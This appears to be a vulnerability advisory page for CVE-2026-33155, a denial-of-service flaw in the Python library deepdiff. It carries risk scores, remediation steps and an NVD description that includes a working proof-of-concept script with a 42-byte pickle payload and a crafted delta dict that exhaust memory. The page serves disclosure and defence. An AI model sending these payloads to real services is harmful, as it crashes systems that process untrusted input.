CVE-2026-33155: deepdiff: DoS causes service disruption

GHSA-54jj-px8x-5w5q HIGH CISA: TRACK*
Published March 18, 2026
CISO Take

Upgrade deepdiff to 8.6.2 immediately if your team uses it in any Python application that processes untrusted input. A 40-byte payload can exhaust 10+ GB of memory, crashing any service that calls pickle_load or accepts delta objects from external sources. Audit every API endpoint, file upload handler, and message queue consumer that ingests deepdiff-serialized data — those are your highest-priority exposure points.

Risk Assessment

Medium-high for organizations using deepdiff in data-processing pipelines exposed to untrusted input. The amplification ratio (800,000x–2,000,000x) makes this a highly efficient DoS vector — an attacker can crash a service with trivial bandwidth. EPSS is currently low (0.042%), suggesting no active exploitation, but the PoC is public and the technique requires no AI/ML expertise. AI/ML teams routinely use deepdiff for model output diffing, dataset change tracking, and configuration comparison, often without sanitizing upstream data sources.

Affected Systems

Package Ecosystem Vulnerable Range Patched
deepdiff pip >= 5.0.0, <= 8.6.1 8.6.2

Do you use deepdiff? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
0.1%
chance of exploitation in 30 days
Higher than 23% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps
  1. PATCH

    Upgrade deepdiff to >= 8.6.2 — only complete fix.

  2. AUDIT

    Grep your codebase for pickle_load, Delta(, and deepdiff.serialization to enumerate all ingestion points.

  3. ISOLATE

    If patching is not immediate, run deepdiff deserialization in a subprocess with memory limits (cgroups/ulimit) so a DoS payload cannot crash the host process.

  4. VALIDATE

    Add input size limits before passing data to pickle_load or Delta() — reject payloads above a reasonable threshold (e.g., 1 MB).

  5. DETECT

    Alert on OOM kills or sudden memory spikes in services that process serialized diff data.

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk management system
ISO 42001
6.1.2 - AI risk assessment
NIST AI RMF
GOVERN 1.2 - Accountability and risk management for AI systems
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2026-33155?

Upgrade deepdiff to 8.6.2 immediately if your team uses it in any Python application that processes untrusted input. A 40-byte payload can exhaust 10+ GB of memory, crashing any service that calls pickle_load or accepts delta objects from external sources. Audit every API endpoint, file upload handler, and message queue consumer that ingests deepdiff-serialized data — those are your highest-priority exposure points.

Is CVE-2026-33155 actively exploited?

No confirmed active exploitation of CVE-2026-33155 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33155?

1. PATCH: Upgrade deepdiff to >= 8.6.2 — only complete fix. 2. AUDIT: Grep your codebase for `pickle_load`, `Delta(`, and `deepdiff.serialization` to enumerate all ingestion points. 3. ISOLATE: If patching is not immediate, run deepdiff deserialization in a subprocess with memory limits (cgroups/ulimit) so a DoS payload cannot crash the host process. 4. VALIDATE: Add input size limits before passing data to pickle_load or Delta() — reject payloads above a reasonable threshold (e.g., 1 MB). 5. DETECT: Alert on OOM kills or sudden memory spikes in services that process serialized diff data.

What systems are affected by CVE-2026-33155?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, data validation pipelines, CI/CD ML pipelines, agent frameworks.

What is the CVSS score for CVE-2026-33155?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary The pickle unpickler `_RestrictedUnpickler` validates which classes can be loaded but does not limit their constructor arguments. A few of the types in `SAFE_TO_IMPORT` have constructors that allocate memory proportional to their input (`builtins.bytes`, `builtins.list`, `builtins.range`). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call `pickle_load` with untrusted data. ### Details CVE-2025-58367 hardened the delta class against pollution and remote code execution by converting `SAFE_TO_IMPORT` to a `frozenset` and blocking traversal. `_RestrictedUnpickler.find_class` only gates which classes can be loaded. It doesn't intercept `REDUCE` opcodes or validate what is passed to constructors. It can be exploited in 2 ways. **1 - During `pickle_load`** A pickle that calls `bytes(N)` using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override `load_reduce` so any allowed class can be called. ``` GLOBAL builtins.bytes (passes find_class check — serialization.py:353) INT 10000000000 (10 billion) TUPLE + REDUCE → bytes(10**10) → allocates ~9.3 GB ``` **2 - During delta application** A valid diff dict that first sets a value to a large int via `values_changed`, then converts it to bytes via `type_changes`. It works because `_do_values_changed()` runs before `_do_type_changes()` in `Delta.add()` in `delta.py` line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls `new_type(current_old_value)` at `delta.py` line 576 with no size guard. ### PoC The script uses Python's `resource` module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change `10**8` to `10**10` for the full 9.3 GB allocation. ```python import resource import sys def limit_memory(maxsize_mb): """Cap virtual memory for this process.""" soft, hard = resource.getrlimit(resource.RLIMIT_AS) maxsize_bytes = maxsize_mb * 1024 * 1024 try: resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard)) print(f"[*] Memory limit set to {maxsize_mb} MB") except ValueError: print("[!] Failed to set memory limit.") sys.exit(1) # Load heavy imports before enforcing the limit from deepdiff import Delta from deepdiff.serialization import pickle_dump, pickle_load limit_memory(1024) # --- Delta application path --- payload_dict = { 'values_changed': {"root['x']": {'new_value': 10**8}}, 'type_changes': {"root['x']": {'new_type': bytes}}, } payload1 = pickle_dump(payload_dict) print(f"Payload size: {len(payload1)} bytes") target = {'x': 'anything'} try: result = target + Delta(payload1) print(f"Allocated: {len(result['x']) // 1024 // 1024} MB") print(f"Amplification: {len(result['x']) // len(payload1)}x") except MemoryError: print("[!] MemoryError — payload tried to allocate too much") # --- Raw pickle path --- payload2 = ( b"(dp0\n" b"S'_'\n" b"cbuiltins\nbytes\n" b"(I100000000\n" b"tR" b"s." ) print(f"Payload size: {len(payload2)} bytes") try: result2 = pickle_load(payload2) print(f"Allocated: {len(result2['_']) // 1024 // 1024} MB") except MemoryError: print("[!] MemoryError — payload tried to allocate too much") ``` Output: ``` [*] Memory limit set to 1024 MB Payload size: 123 bytes Allocated: 95 MB Amplification: 813008x Payload size: 42 bytes Allocated: 95 MB ``` ### Impact Denial of service. Any application that deserializes delta objects or calls `pickle_load` with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion. The amplification is large. 800,000x for delta and 2,000,000x for raw pickle. Impacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.

Exploitation Scenario

An adversary submits a malicious serialized deepdiff delta to a model comparison API that accepts untrusted payloads (e.g., a collaborative ML platform or CI pipeline). The payload uses `values_changed` to set a value to 10^8, then `type_changes` to convert it to `bytes`, exploiting the fixed execution order in Delta.add(). When the API deserializes the delta, `bytes(10**8)` allocates ~95 MB per request. With concurrent requests, the service exhausts available memory and crashes — no authentication required if the endpoint accepts external uploads. Alternatively, the raw pickle path requires just a 42-byte payload with 2,000,000x amplification.

Timeline

Published
March 18, 2026
Last Modified
March 20, 2026
First Seen
March 24, 2026

Related Vulnerabilities